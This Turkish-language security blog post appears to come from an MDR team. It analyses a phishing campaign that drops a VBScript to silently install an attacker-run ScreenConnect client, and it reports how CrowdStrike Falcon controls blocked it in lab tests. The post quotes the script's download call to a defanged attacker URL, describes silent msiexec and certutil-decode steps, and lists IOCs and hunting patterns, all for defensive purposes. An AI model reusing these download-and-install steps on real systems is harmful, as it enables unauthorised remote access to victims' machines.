Günümüz saldırılarında güvenlik kontrollerinin aşılması ve yetkisiz erişimin olağan kurumsal faaliyetler arasında gizlenmesi amacıyla meşru yazılımlar tehdit aktörleri tarafından sıklıkla suistimal edilmektedir. Uzaktan izleme ve yönetim araçları (RMM), bu yaklaşımın yaygın örnekleri arasındadır. Son dönemde RMM suistimalinin arttığı ve phishing kampanyalarıyla kullanıcıların saldırgan tarafından yönetilen uzaktan erişim client programlarını kurmaya yönlendirildiği raporlanmıştır.
Bu saldırılarda sahte Zoom, Microsoft Teams ve Google Meet davetleri üzerinden veya zorunlu güncelleme yönlendirmeleri kullanılabilmektedir. Belge inceleme talepleri, DocuSign görünümlü bildirimler ve Evite ya da Punchbowl temalı davetiyeler de RMM dağıtımını hedefleyen phishing kampanyalarında kullanılan yöntemler arasında yer almaktadır.
Bu konu doğrultusunda, InfinitumIT MDR ekibi tarafından gerçek bir phishing kampanyası kapsamında incelenen Adobe temalı VBScript ve ScreenConnect saldırı zinciri ele alınmıştır. CrowdStrike Falcon'a geçtiğimiz ay eklenen Application Abuse Prevention özelliğinin, RMM client programının yürütülmesi sırasında gerçek zamanlı müdahale uygulayarak ScreenConnect suistimalini engellemesi laboratuvar ortamında doğrulanmıştır. Vaka bulguları üzerinden Application Abuse Prevention müdahalesi, MSI aşamasındaki ek tespitler ve InfinitumIT Custom IOA kuralı seti ile sağlanan erken engelleme karşılaştırılmıştır.
Adobe Temalı Phishing Kampanyası ve VBScript Teslimi
İncelenen kampanyada kullanıcı, kendisine iletilen gizli bir belgenin Adobe üzerinden görüntülenmesi gerektiği yönlendirmesiyle hedeflenmiştir. Adobe görünümünü taklit eden PDF içerisindeki “View with Adobe” bağlantısı üzerinden saldırgana ait web sayfasına yönlendirme yapılmıştır. PDF görüntüleyicisinin güvenlik uyarısında hedef adresin file-viewer[.]shit[.]vc olduğu görülmüştür.
Yönlendirme sayfasında Browser-in-the-Browser tekniği kullanılarak tarayıcı içerisinde sahte bir Adobe penceresi ve adres çubuğu oluşturulmuştur. Gerçek tarayıcı adresinde saldırgana ait alan adı bulunmasına rağmen taklit edilen pencere içerisinde adobe.com adresi gösterilmiştir. “Adobe Reader kurulumu” olarak sunulan indirme işleminin, rastgele karakterlerle isimlendirilmiş bir Visual Basic Script dosyası teslim ettiği tespit edilmiştir.
İndirilen dosyanın kullanıcı tarafından açılmasıyla Windows Script Host üzerinden kod yürütme aşamasına geçilmiştir. Bu noktada belge görüntüleme yönlendirmesi, endpoint üzerinde wscript.exe aracılığıyla VBScript çalıştırılmasına dönüşmüştür.
Ana Örnekte Doğrudan VBScript ve MSI Yürütme Zinciri
Ana kampanyada MSI indirme işlemi, VBScript içerisindeki HTTP ve execution objectleri aracılığıyla gerçekleştirilmiştir. CrowdStrike telemetrisinde IServerXMLHTTPRequest2.open çağrısıyla GET request methodu ve hedef URL tanımlandığı, ardından send, responseBody ve SaveToFile çağrılarının yürütüldüğü görülmüştür.
CrowdStrike script telemetrisinde kaydedilen ilgili çağrı aşağıda sunulmuştur.
IServerXMLHTTPRequest2.open(
"GET",
"hxxps://apv2[.]hanikbloom[.]com/ope/ScreenConnect.ClientSetup.msi",
"false");
msiexec.exe çağrısına ilişkin kayıtlar.MSI paketinin %TEMP% altında SC_Setup_<değişken>.msi biçiminde kaydedildiği ve msiexec.exe üzerinden /qn /norestart parametreleriyle sessiz kurulumun başlatıldığı görülmüştür. Bu örnekte indirme amacıyla ayrı bir PowerShell veya certutil alt processi kullanılmamıştır. Yürütme zinciri, wscript.exe sonrasında doğrudan msiexec.exe aşamasına ilerlemiştir.
Application Abuse Kapalıyken Gözlemlenen Sonuçlar
InfinitumIT laboratuvar ortamında gerçekleştirilen ilk testte Application Abuse özelliği devre dışı bırakılmış, diğer endpoint prevention policy ayarları en sıkı seviyelerde yapılandırılmıştır. VBScript çalıştırılması, MSI kurulumu ve ScreenConnect client programının yürütülmesi aşamalarında herhangi bir alarm veya engelleme gözlemlenmemiştir. Buna rağmen execution zincirine ait process ilişkileri CrowdStrike telemetrisine kaydedilmiştir.
Telemetri loglarından oluşturulan graph tabanlı process tree aşağıdaki şekildedir.
wscript.exe sonrasında başlatılan msiexec.exe ve sessiz MSI kurulumuna ait komut satırı.MSI kurulumunu takiben ScreenConnect.WindowsClient.exe processinin başlatıldığı ve çalışmaya devam ettiği görülmüştür. Konsoldaki “Currently Running” durumu, client programının yürütülmesini doğrulamıştır. Bu testte saldırı zincirinin telemetri üzerinden incelenebildiği, ancak aynı aktivitelerin alarm veya önleme aksiyonuna dönüşmediği tespit edilmiştir.
ScreenConnect.WindowsClient.exe için görülen “Currently Running” durumu.Application Abuse Prevention Policy Yapılandırması
ScreenConnect gibi meşru uzaktan erişim araçları, saldırganın yönettiği bir yapılandırmayla kurulduğunda yetkisiz erişim amacıyla kullanılabilmektedir. Application Abuse Prevention, bu tür uygulamaların kullanımına politika düzeyinde kontrol uygulanmasını sağlamaktadır. CrowdStrike tarafından açıklanan bu yaklaşım, suistimale açık uygulamalara yönelik önleme kontrolleriyle davranışsal tespitlerin tamamlanmasını amaçlamaktadır. [1]
İkinci test kapsamında INFNT-App-Abuse-Test adlı Windows Application Abuse Prevention politikası etkinleştirilmiştir. Remote monitoring and management (RMM) kategorisinde “Prevent all” seçilerek politika kapsamındaki RMM uygulamalarının yürütülmesinin engellenmesi hedeflenmiştir.
INFNT-App-Abuse-Test politikası ve RMM kategorisinde uygulanan “Prevent all” yapılandırması.Politika ekranında, “Prevent all” etkinleştirilmeden önce mevcut RMM kullanımının dashboard üzerinden incelenmesi, izin verilecek uygulamalar için exclusions oluşturulması ve endpoint prevention politikasındaki “Unknown executable analysis” ayarının etkinleştirilmesi önerilmektedir. Üretim ortamına uygulanacak kapsam ve istisnalar, kurumun onaylı uzaktan destek ihtiyaçlarına göre belirlenmelidir.
Bu kontrol, kurumda kullanımına izin verilmeyen RMM uygulamalarına uygulama düzeyinde müdahale edilmesini sağlamaktadır. Script çalıştırma davranışını hedefleyen tespitler ve Custom IOA kurallarıyla birlikte kullanılması, aynı saldırı zincirinin farklı aşamalarda ele alınmasına olanak tanımaktadır.
Application Abuse ile ScreenConnect Client Programının Engellenmesi
Application Abuse etkinleştirildikten sonra ana kampanyaya ait VBScript yeniden çalıştırılmıştır. Script aşamasında yerleşik bir alarm veya engelleme gözlemlenmemiştir. MSI kurulumunun başlattığı ScreenConnect.ClientService.exe processine ise Application Abuse Prevention kapsamında müdahale edildiği tespit edilmiştir.
Test sonucunda ScreenConnect client programının çalışmasının engellendiği ve client programının sistemden kaldırıldığı gözlemlenmiştir. Falcon konsolunda uygulanan aksiyon “Remediation performed” olarak kaydedilmiştir. Alarm kaydının Informational severity seviyesinde olması, ilgili olayda önleme aksiyonu uygulanmadığı veya düşük riskli bir olay olduğu anlamına gelmemektedir.
Process kaydında client programı servisinin kısa süreli başlatıldığı ve ardından müdahale uygulandığı görülmüştür. Dolayısıyla bu testte Application Abuse kontrolünün etkisi, RMM client programının yürütülmesi aşamasında doğrulanmıştır. VBScript çalıştırılması ve MSI indirilmesi, bu müdahaleden önce gerçekleşmiştir.
MSI Kurulumu Aşamasında Oluşan Ek Tespit
Application Abuse testinde msiexec.exe ile ilişkili High seviyeli MaliciousMsiInstaller alarmı da oluşmuştur. İlgili kayıt, Falcon tarafından Persistence via Event Triggered Execution ve T1546 ile eşleştirilmiştir. MSI kurulum aktivitesine ilişkin bu tespit, RMM client programına uygulanan Application Abuse müdahalesinden ayrı bir alarm olarak değerlendirilmiştir.
MaliciousMsiInstaller alarmının önem seviyesi, teknik eşleştirmesi ve “Remediation performed” aksiyonu.Telemetri loglarından oluşturulan graph tabanlı process tree incelendiğinde High seviyeli tespitin msiexec.exe processi ile ilişkilendirildiği görülmüştür.
wscript.exe ve msiexec.exe yürütme zincirinde MSI processine ilişkilendirilen High seviyeli tespit.İlk testte alarm oluşmayan MSI aktivitesinin sonraki testte tespit edildiği gözlemlenmiştir. Bu bulgu, tespit davranışındaki değişimi göstermektedir. CrowdStrike tarafında şüpheli MSI kurulumları doğrultusunda tespit mekanizmasında güncelleme yapılmış olabileceği değerlendirilmektedir. Her iki testte de ana örneğin VBS çalıştırma aşamasında yerleşik alarm veya engelleme gözlemlenmemiştir.
Application Abuse özelliği sayesinde ilgili RMM programının kurulumu son aşamada başarıyla engellenmiştir.
Diğer Kampanya Örneklerinde VBScript Çalıştırma Zincirinin Engellenmesi
Ana örneğe ek olarak, benzer RMM phishing kampanyalarında kullanılan farklı VBScript dosyaları da test edilmiştir. Özellikle obfuscated içerik veya komutlar barındıran, PowerShell ya da certutil processlerini devreye alan örneklerde CrowdStrike tarafından başarılı tespit ve engelleme gerçekleştirilmiştir. Bu sonuçlar, test edilen VBS örneklerinin ürettiği davranış ve process ilişkileri çerçevesinde değerlendirilmiştir.
PowerShell içeren örnekte PDF_Upgrade_Installation.vbs.vbs dosyası wscript.exe üzerinden çalıştırılmış ve execution zincirinde powershell.exe processi oluşmuştur. CrowdStrike alarm kaydında Medium seviyeli “Command and Control via Remote Access Tools” tespiti üretilmiş, “Parent process killed” aksiyonu uygulandığı görülmüştür.
wscript.exe ve powershell.exe içeren zincirde CrowdStrike tarafından uygulanan process sonlandırma aksiyonu.Obfuscated certutil Komutunun Engellenmesi
Diğer örnekte explorer.exe sonrasında iki wscript.exe processi ve certutil.exe içeren bir execution zinciri gözlemlenmiştir. High seviyeli alarmda alarm ObfCertutilCmd olarak kaydedilmiştir. İlgili davranış “Defense Evasion via Deobfuscate/Decode Files or Information” ve T1140 ile eşleştirilmiş, “Process blocked” aksiyonu uygulanmıştır.
certutil.exe üzerinde oluşan ObfCertutilCmd alarmı ve “Process blocked” aksiyonu.Komut satırında -f -decode parametreleri kullanılarak geçici dizindeki .b64 içeriğinin ScreenConnect.ClientSetup.msi dosyasına dönüştürülmeye çalışıldığı görülmüştür. Bu nedenle görüntüde doğrulanan engelleme noktası, RMM client'ının MSI dosyasına dönüştürülmesi aşamasıdır.
ObfCertutilCmd adı.Ana kampanyada ise MSI içeriği doğrudan VBScript içerisindeki HTTP ve execution çağrılarıyla alınmış ve msiexec.exe ile çalıştırılmıştır. Ek testlerde engellenen PowerShell ve certutil aşamaları bu zincirde bulunmamaktadır. Bulgular, CrowdStrike tarafından bazı VBS çeşitlerinin başarıyla engellendiğini, ancak ana örnekte script aşamasında aynı sonucun elde edilmediğini göstermektedir.
Custom IOA ile VBScript Aşamasında Erken Engelleme
InfinitumIT MDR hizmeti kapsamında geliştirilen Custom IOA kural setimiz, farklı saldırı tekniklerini kapsamak, endpoint üzerindeki saldırı yüzeyini daraltmak ve CrowdStrike önleme yeteneklerini ortamın ihtiyaçlarına göre güçlendirmek amacıyla kullanılmaktadır. Ana kampanyadaki VBScript çalıştırma davranışı da bu kural seti kapsamında ayrıca test edilmiştir.
Test sırasında INFNT-IOA-0140 - Script Execution via WScript or CScript kuralı tetiklenmiştir. Process Creation türündeki kural üzerinden, indirilen VBS dosyasını çalıştıran wscript.exe için High seviyeli Custom IOA kaydı oluşturulmuş ve “Process blocked” aksiyonu uygulanmıştır.
INFNT-IOA-0140 kuralının tetiklenmesi ve wscript.exe için “Process blocked” sonucu.
Bu testte RMM client programının çalıştırılmasını beklemeden script host processine müdahale edildiği doğrulanmıştır. Application Abuse testinde ScreenConnect client programına uygulanan kontrol, Custom IOA testinde daha erken bir aşamayı hedefleyen davranışsal engellemeyle tamamlanmıştır.
Test Sonuçlarının Karşılaştırmalı Değerlendirmesi
InfinitumIT lab ortamında MDR ekibince gerçekleştirilen testlerde, aynı RMM hedefine ilerleyen farklı execution zincirlerinin farklı aşamalarda durdurulabildiği görülmüştür. Ana örnekte Application Abuse ile client programına müdahale edilmiş, Custom IOA kontrolüyle script host aşamasında erken engelleme sağlanmıştır. Temel sonuçlar aşağıdaki tabloda karşılaştırılmıştır.
| Test senaryosu | Gözlenen tespit | Gözlenen sonuç |
|---|---|---|
| Ana örnek Application Abuse kapalı | Script, MSI ve client programı aşamalarında alarm gözlemlenmemiştir | ScreenConnect kurulmuş ve çalıştırılmıştır |
| Ana örnek Application Abuse açık | VBS aşamasında alarm gözlemlenmemiştir RMM kaydı Informational MSI alarmı High | Client programına müdahale edilmiş ve remediation uygulanmıştır |
| Ana davranış Custom IOA testi | INFNT-IOA-0140High | wscript.exeProcess blocked |
| Diğer VBS örneği PowerShell zinciri | Remote Access Tools Medium | Parent process killed |
| Diğer VBS örneği certutil zinciri | ObfCertutilCmdHigh | certutil.exeProcess blocked |
Ana kampanyada Application Abuse, script aşamasında alarm oluşmasına bağlı kalmadan RMM kullanımına politika uygulamıştır. Falcon telemetrisi inceleme için process ilişkilerini sağlamış, yerleşik MSI tespiti kurulum aşamasını görünür kılmış ve Custom IOA kuralı script çalıştırılmasına müdahale etmiştir. Bu bulgular, telemetri, alarm ve önleme aksiyonlarının ayrı olarak doğrulanması gerektiğini göstermektedir.
Test sonuçları, çalıştırılan örnek ve uygulanan politika bağlamında geçerlidir. Diğer VBS çeşitlerinde başarılı engelleme görülmesi, ana kampanyanın script aşamasındaki sonucu değiştirmemektedir. Aynı şekilde RMM client programına uygulanan müdahale ile MSI aktivitesine ilişkin ek alarmın ayrı kayıtlardan doğrulanması, önleme mekanizmalarının doğru değerlendirilmesini sağlamaktadır.
Davranışsal Hunting Önerileri
Aşağıdaki öneriler vaka bulguları ve lab testleri esas alınarak hazırlanmıştır. İnceleme önceliğinin, birden fazla sinyalin aynı cihaz ve çalıştırma zincirinde birleşmesine göre belirlenmesi önerilmektedir.
Script ve MSI ilişkisi: Downloads, Desktop veya geçici dizinlerden çalıştırılan VBS dosyaları, wscript.exe ya da cscript.exe ağ bağlantıları, MSI dosyası oluşturulması ve ardından msiexec.exe yürütülmesiyle ilişkilendirilmelidir. SC_Setup_*.msi, /qn ve /norestart gibi komut satırı parametreleri process bağlamıyla birlikte incelenmelidir. Ana örnekte ayrı bir PowerShell processi bulunmadığından, hunting kapsamının yalnızca PowerShell alt processlerine bağlı oluşturulmaması gerekmektedir.
ScreenConnect ve 8041 trafiği: Endpointlerden internet üzerindeki TCP/8041 hedeflerine yapılan ve onaylı uzaktan destek altyapısıyla eşleşmeyen bağlantıların izlenmesi önerilmektedir. Bu vakada servis komut satırındaki p=8041 değeri bağlantı portunu göstermektedir. Hedef alan adı ve IP; ScreenConnect processi, servis kurulumu ve client programı yapılandırmasıyla ilişkilendirilmelidir. Port eşleşmesi tek başına saldırı kanıtı değildir; değerlendirme process ve hedef altyapı bağlamında gerçekleştirilmelidir.
Cloudflare üzerinden MSI paketi teslimi: Benzer RMM phishing kampanyalarında workers.dev ve r2.dev gibi paylaşımlı hosting altyapılarının RMM client'larını barındıran MSI paket teslimi amacıyla suistimal edilebildiği görülmektedir. Bu altyapılar üzerinden MSI, ZIP veya ara yüklerin sağlanabildiği dikkate alınmalı; değerlendirme tam alt alan adı, URL yolu, dosya yazımı ve devamındaki execution aktiviteleriyle birlikte gerçekleştirilmelidir.
Tarayıcı dışı erişimler: workers.dev ve r2.dev adreslerine wscript.exe, cscript.exe, powershell.exe, mshta.exe, certutil.exe, curl.exe veya msiexec.exe gibi processlerden yapılan isteklerin özellikle incelenmesi önerilmektedir. Tam alt alan adı, varsa URL yolu, dosya yazımı ve sonraki kurulum aktivitesi ilişkilendirilmelidir. Kaynak process EDR telemetrisiyle doğrulanmalı, User-Agent bilgisi tek başına yeterli kabul edilmemelidir. Meşru otomasyonlar ve tarayıcıdan başlayan indirmeler de değerlendirme kapsamında tutulmalıdır.
Yeni RMM servisleri ve bağlantı hedefleri: ScreenConnect.ClientService.exe ve ScreenConnect.WindowsClient.exe processleri; yeni servis kaydı, kurulum dizini ve komut satırındaki h= ile p= parametreleriyle birlikte değerlendirilmelidir. Kurumda ScreenConnect kullanılsa dahi farklı bir sunucuya bağlanan yeni client programları ayrıca incelenmelidir. Müdahale sonrasında processin, servisin ve ilgili dış bağlantıların devam edip etmediği doğrulanmalıdır.
workers.dev ve r2.dev, meşru uygulamaların da kullandığı paylaşımlı hizmetlerdir. Bu alan adlarının tamamının zararlı IOC olarak değerlendirilmesi uygun değildir. Önceliklendirme, şüpheli alt alan adı ve davranış eşleşmelerine göre yapılmalıdır.
Olaya Ait IOC Verileri
Aşağıdaki indikatörler, kampanya incelemesinde paylaşılan veriler ve CrowdStrike kayıtları esas alınarak derlenmiştir. IP ve alan adı eşleşmeleri ilgili olay bağlamındaki değerleri yansıtmaktadır; barındırma bilgileri ve kullanım amacı zaman içerisinde değişebilmektedir.
| Gösterge türü | Değer |
|---|---|
| Yönlendirme alan adı | file-viewer[.]shit[.]vc |
| Yönlendirme IP adresi | 216.126.237.29 |
| MSI indirme alan adı | apv2[.]hanikbloom[.]com |
| MSI indirme IP adresi | 132.243.165.131 |
| ScreenConnect bağlantı alan adı | berneys[.]fumoff[.]com |
| ScreenConnect bağlantı IP ve port | 162.220.13.202:8041 |
| Ek ScreenConnect bağlantı alan adı | apiv7[.]ghadirfoods[.]com |
| ScreenConnect MSI MD5 | EA78E2B01AB8D6ED9C7F616CEF729C65 |
Tam MSI indirme adresi, Falcon script telemetrisi üzerinden ayrıca doğrulanmıştır:
hxxps://apv2[.]hanikbloom[.]com/ope/ScreenConnect.ClientSetup.msi
Telemetride Gözlemlenen Ek Dosya ve Yapılandırma İzleri
Script kaydında MSI paketinin %TEMP% altında SC_Setup_9E79.msi adıyla kaydedildiği görülmüştür. Kurulum sonrasında başlatılan servis komut satırında h=berneys[.]fumoff[.]com ve p=8041 parametreleri tespit edilmiştir. İlgili servis yolu aşağıda sunulmuştur:
C:\Program Files (x86)\ScreenConnect Client (2c0864b709124ff1)\
ScreenConnect.ClientService.exe
Dosya adları, kurulum dizini ve ScreenConnect processleri tek başına zararlılık göstergesi değildir. Bu izler, IOC tablosundaki bağlantı hedefleri ve VBS ve MSI yürütme zinciriyle birlikte değerlendirilmelidir. MD5, paylaşılan MSI örneğinin eşleştirilmesi amacıyla verilmiştir; farklı veya yeniden oluşturulmuş kurulum paketlerinde dosya özeti değişebilmektedir.
InfinitumIT MDR ile Sürekli Tespit ve Müdahale
RMM suistimalinde bir client programının meşru üretici imzasına sahip olması, bağlantı kurduğu sunucunun kuruma ait olduğunu veya kullanımının yetkilendirildiğini doğrulamamaktadır. Bu nedenle process ilişkilerinin, ağ bağlantılarının ve uygulama yapılandırmasının birlikte değerlendirilmesi gerekmektedir. İncelenen vaka, alarm üretmeyen aktivitelerin de telemetri üzerinden araştırılmasının önemini ortaya koymuştur.
InfinitumIT MDR hizmeti kapsamında endpoint, ağ ve kimlik verileri üzerinde 7/24 tehdit izleme, tehdit avcılığı ve uzman analist değerlendirmesi sağlanmaktadır. Şüpheli aktivitelerin doğrulanması ve olay müdahalesi, kurumun mevcut güvenlik operasyonlarıyla birlikte yürütülmektedir.
Bu çalışmada gerçekleştirilen laboratuvar testleri, CrowdStrike Application Abuse yapılandırmasının değerlendirilmesi ve INFNT Custom IOA kural setinin uygulanması, MDR hizmetinin somut katkıları arasında yer almaktadır. Kampanya bulgularının hunting çalışmalarına ve ortama uygun önleme kurallarına dönüştürülmesiyle, kullanılan güvenlik çözümlerinin tespit ve engelleme kapsamının sürekli geliştirilmesi amaçlanmaktadır.
Kaynaklar
Makalede referans verilen CrowdStrike kaynağı aşağıda sunulmuştur.
[1] CrowdStrike — How CrowdStrike Stops Living-off-the-Land Attacks
Hakan AKSUNGUR
InfinitumIT MDR
Bu yazı, gerçek bir phishing kampanyasına ait bulgular ile InfinitumIT laboratuvar ortamında CrowdStrike Falcon üzerinde yürütülen kontrollü testlere dayanmaktadır.